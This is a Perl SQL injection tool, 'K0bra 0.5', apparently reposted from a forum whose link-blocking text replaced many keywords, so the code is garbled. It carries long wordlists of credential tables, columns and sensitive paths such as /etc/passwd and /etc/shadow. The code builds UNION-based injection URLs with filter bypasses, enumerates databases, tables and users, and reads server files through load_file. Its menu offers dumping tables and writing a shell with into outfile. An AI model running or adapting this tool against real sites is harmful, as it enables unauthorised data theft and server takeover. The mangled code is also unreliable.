[Perl] K0bra 0.5

 

You are not allowed to view links. Register or Login('cls');

You are not allowed to view links. Register or Login ("title k0bra");

 

 

 

@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

 

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');

 

 

@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

 

use LWP::UserAgent;

use HTTP::Request;

use HTTP::Request::Common;

use URI::Split You are not allowed to view links. Register or Login(uri_split);

 

my $nave = LWP::UserAgent->new();

 

unless(@ARGV == 2) {

} else {

 

sub menu {

You are not allowed to view links. Register or Login "[Page] : ";

You are not allowed to view links. Register or Login(my $page=<STDIN>);

You are not allowed to view links. Register or Login "\n[Bypass : -- /* %00] : ";

You are not allowed to view links. Register or Login(my $bypass = <STDIN>);

You are not allowed to view links. Register or Login "\n\n";

 

sub scan {

You are not allowed to view links. Register or Login "[Status] : Scanning.....\n";

$pass = &bypass($_[1]);

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $save = $auth;

if ($_[0]=~/hackman/ig) {

savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");

my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($_[0],$_[1]);

if ($control eq 1) {

You are not allowed to view links. Register or Login "[Status] : Enjoy the menu\n\n";

} else {

You are not allowed to view links. Register or Login $control;

You are not allowed to view links. Register or Login "[Status] : Length columns not found\n\n";

 

sub head {

You are not allowed to view links. Register or Login 'cls';

You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(

 

 

 @      @@   @            

@@     @  @ @@            

 @ @@  @  @  @ @   @ @ @@@

 @ @   @  @  @@ @ @@@ @  @

 @@    @  @  @  @  @   @@@

 @ @   @  @  @  @  @  @  @

@@@ @   @@   @@@  @@@ @@@@@

 

 

 

 

 

 

 

 

sub copyright {

You are not allowed to view links. Register or Login "\n\n\n\n(C) Doddy Hackman 2010\n\n";

 

 

sub toma {

You are not allowed to view links. Register or Login $nave->request (GET $_[0])->content;

 

 

sub savefile {

You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);

You are not allowed to view links. Register or Login SAVE $_[1]."\n";

You are not allowed to view links. Register or Login SAVE;

 

sub finish {

You are not allowed to view links. Register or Login "\n\n\n(C) Doddy Hackman 2010\n\n";

You are not allowed to view links. Register or Login(1);

 

 

sub You are not allowed to view links. Register or Login {

my $rows  = "0";

my $asc;

my $page = $_[0];

($pass1,$pass2) = &bypass($_[1]);

$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;

$code = toma($inyection);

if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {

$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);

if ($code1=~/The used SELECT statements have a different number of columns/ig) {

my $patha = $1;

You are not allowed to view links. Register or Login $patha;

$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";

$total = "1";

for my $rows(2..200) {

$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";

$total.= ",".$rows;

$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;

$test = toma($injection);

if ($test=~/RATSXPDOWN/) {

@number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;

$control = 1;

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $save = $auth;

savefile($save.".txt","\n[Target confirmed] : $page");

savefile($save.".txt","[Bypass] : $_[1]\n");

savefile($save.".txt","[Limit] : The site has $rows columns");

savefile($save.".txt","[Data] : The number @number print data");

if ($patha) {

savefile($save.".txt","[Full Path Discloure] : $patha");

$total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;

savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);

You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);

 

sub bypass {

if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }

elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }

else {You are not allowed to view links. Register or Login ("+","--");}}

 

sub ascii {

You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];

 

sub ascii_de {

$_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];

You are not allowed to view links. Register or Login $_[0];

 

sub details {

my ($page,$bypass,$save) = @_;

($pass1,$pass2) = &bypass($bypass);

savefile($save.".txt","\n");

if ($page=~/(.*)hackman(.*)/ig) {

You are not allowed to view links. Register or Login "\n\n[+] Searching information..\n\n";

my  ($start,$end) = ($1,$2);

$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;

$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;

$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);

$test1 = toma($inforschema);

$test2 = toma($mysqluser);

if ($test2=~/ERTOR854/ig) {

savefile($save.".txt","[mysql.user] : ON");

You are not allowed to view links. Register or Login "[mysql.user] : ON\n";

} else {

You are not allowed to view links. Register or Login "[mysql.user] : OFF\n";

savefile($save.".txt","[mysql.user] : OFF");

if ($test1=~/ERTOR854/ig) {

You are not allowed to view links. Register or Login "[information_schema.tables] : ON\n";

savefile($save.".txt","[information_schema.tables] : ON");

} else {

You are not allowed to view links. Register or Login "[information_schema.tables] : OFF\n";

savefile($save.".txt","[information_schema.tables] : OFF");

if ($test3=~/ERTOR854/ig) {

You are not allowed to view links. Register or Login "[+] load_file permite ver los archivos\n";

savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);

$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";

$injection = $start.$concat.$end.$pass2;

$code = toma($injection);

if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {

You are not allowed to view links. Register or Login "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";

savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");

} else {

You are not allowed to view links. Register or Login "\n[-] Not found any data\n";

 

sub menu_options {

You are not allowed to view links. Register or Login "[Target confirmed] : $_[0]\n";

You are not allowed to view links. Register or Login "[Bypass] : $_[1]\n\n";

 

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $save = $auth;

You are not allowed to view links. Register or Login "[save] : /logs/webs/$save\n\n";

You are not allowed to view links. Register or Login "\n\n--== information_schema.tables ==--\n\n";

You are not allowed to view links. Register or Login "[1] : Show tables\n";

You are not allowed to view links. Register or Login "[2] : Show columns\n";

You are not allowed to view links. Register or Login "[3] : Show DBS\n";

You are not allowed to view links. Register or Login "[4] : Show tables with other DB\n";

You are not allowed to view links. Register or Login "[5] : Show columns with other DB\n";

You are not allowed to view links. Register or Login "\n\n--== mysql.user ==--\n\n";

You are not allowed to view links. Register or Login "[6] : Show users\n";

You are not allowed to view links. Register or Login "\n\n--== Others ==--\n\n";

You are not allowed to view links. Register or Login "[7] : Fuzzing tables\n";

You are not allowed to view links. Register or Login "[8] : Fuzzing columns\n";

You are not allowed to view links. Register or Login "[9] : Fuzzing files with load_file\n";

You are not allowed to view links. Register or Login "[10] : Dump\n";

You are not allowed to view links. Register or Login "[11] : Informacion of the server\n";

You are not allowed to view links. Register or Login "[12] : Create a shell with into outfile\n";

You are not allowed to view links. Register or Login "[13] : Show Log\n";

You are not allowed to view links. Register or Login "[14] : Change Target\n";

You are not allowed to view links. Register or Login "[15] : Exit\n";

You are not allowed to view links. Register or Login "\n\n[Option] : ";

You are not allowed to view links. Register or Login(my $opcion = <STDIN>);

if ($opcion eq "1") {

schematables($_[0],$_[1],$save);

&reload;       

elsif ($opcion eq "2") {

You are not allowed to view links. Register or Login "\n\n[Tabla] : ";

You are not allowed to view links. Register or Login(my $tabla = <STDIN>);

schemacolumns($_[0],$_[1],$save,$tabla);

elsif ($opcion eq "3") {

elsif ($opcion eq "4") {

You are not allowed to view links. Register or Login "\n\n[DAtabase] : ";

You are not allowed to view links. Register or Login(my $data =<STDIN>);

elsif ($opcion eq "5"){

You are not allowed to view links. Register or Login "\n\n[DB] : ";

You are not allowed to view links. Register or Login(my $db =<STDIN>);

You are not allowed to view links. Register or Login "\n[Table] : ";

You are not allowed to view links. Register or Login(my $table =<STDIN>);

elsif ($opcion eq "6") {

elsif ($opcion eq "13") {

$t = "logs/webs/$save.txt";

You are not allowed to view links. Register or Login("start $t");

elsif ($opcion eq "15") {

elsif ($opcion eq "14") {

elsif ($opcion eq "7") {

elsif ($opcion eq "8") {

You are not allowed to view links. Register or Login "\n\n[Tabla] : ";

You are not allowed to view links. Register or Login(my $tab  = <STDIN>);

elsif ($opcion eq "9") {

elsif ($opcion eq "10") {

You are not allowed to view links. Register or Login "\n\n[Table to dump] : ";

You are not allowed to view links. Register or Login(my $tabla = <STDIN>);

You are not allowed to view links. Register or Login "\n[Column 1] : ";

You are not allowed to view links. Register or Login(my $col1 = <STDIN>);

You are not allowed to view links. Register or Login "\n[Column 2] : ";

You are not allowed to view links. Register or Login(my $col2 = <STDIN>);

You are not allowed to view links. Register or Login "\n\n";

&You are not allowed to view links. Register or Login($_[0],$col1,$col2,$tabla,$_[1],$save);

elsif ($opcion eq "11") {

You are not allowed to view links. Register or Login "\n\n";

elsif ($opcion eq "12") {

You are not allowed to view links. Register or Login "\n\n[Full Path Discloure] : ";

You are not allowed to view links. Register or Login(my $path = <STDIN>);

else {

 

sub schematables {

$real = "1";

my ($page,$bypass,$save) = @_;

savefile($save.".txt","\n");

You are not allowed to view links. Register or Login "\n";

my $page1 = $page;

($pass1,$pass2) = &bypass($_[1]);

savefile($save.".txt","[DB] : default");

You are not allowed to view links. Register or Login "[+] Searching tables with schema\n\n";

$page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;

$page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);

if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

my $resto = $1;

$total = $resto - 17;

You are not allowed to view links. Register or Login "[+] Tables Length :  $total\n\n";

savefile($save.".txt","[+] Searching tables with schema\n");

savefile($save.".txt","[+] Tables Length :  $total\n");

my $limit = $1;

for my $limit(17..$limit) {

$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);

if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

my $table = $1;

You are not allowed to view links. Register or Login $table;

You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";

savefile($save.".txt","[Table $real Found : $table ]");

} else {

You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";

}        

sub reload {

You are not allowed to view links. Register or Login "\n\n[+] Finish\n\n";

 

 

sub schemacolumns {

my ($page,$bypass,$save,$table) = @_;

my $page3 = $page;

my $page4 = $page;

savefile($save.".txt","\n");

You are not allowed to view links. Register or Login "\n";

($pass1,$pass2) = &bypass($bypass);

You are not allowed to view links. Register or Login "\n[DB] : default\n";

savefile($save.".txt","[DB] : default");

savefile($save.".txt","[Table] : $table\n");

$page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;

$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);

if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {

You are not allowed to view links. Register or Login "\n[Columns Length : $1 ]\n\n";

savefile($save.".txt","[Columns Length : $1 ]\n");

my $si = $1;

You are not allowed to view links. Register or Login $si;

$page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;

$real = "1";

for my $limit2(0..$si) {

